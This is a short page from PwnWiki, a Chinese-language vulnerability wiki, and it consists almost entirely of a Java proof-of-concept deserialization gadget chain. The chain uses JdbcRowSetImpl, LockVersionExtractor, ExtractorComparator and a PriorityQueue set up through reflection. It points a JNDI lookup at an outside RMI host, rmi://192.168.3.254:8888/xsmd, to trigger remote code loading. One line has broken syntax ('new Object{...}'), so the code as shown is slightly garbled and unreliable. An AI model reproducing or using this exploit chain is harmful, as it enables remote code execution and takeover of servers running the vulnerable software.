免费、自由、人人可编辑的漏洞库--PwnWiki.com
,
POC
// JdbcRowSetImpl
JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl();
jdbcRowSet.setDataSourceName("rmi://192.168.3.254:8888/xsmd");
MethodAttributeAccessor methodAttributeAccessor = new MethodAttributeAccessor();
methodAttributeAccessor.setGetMethodName("getDatabaseMetaData");
methodAttributeAccessor.setIsWriteOnly(true);
methodAttributeAccessor.setAttributeName("UnicodeSec");
LockVersionExtractor extractor = new LockVersionExtractor(methodAttributeAccessor, "UnicodeSec");
final ExtractorComparator comparator = new ExtractorComparator(extractor);
final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
Object q = new Object{jdbcRowSet, jdbcRowSet};
Reflections.setFieldValue(queue, "queue", q);
Reflections.setFieldValue(queue, "size", 2);
Field comparatorF = queue.getClass().getDeclaredField("comparator");
comparatorF.setAccessible(true);
comparatorF.set(queue, new ExtractorComparator(extractor));
免费、自由、人人可编辑的漏洞库--pwnwiki.com
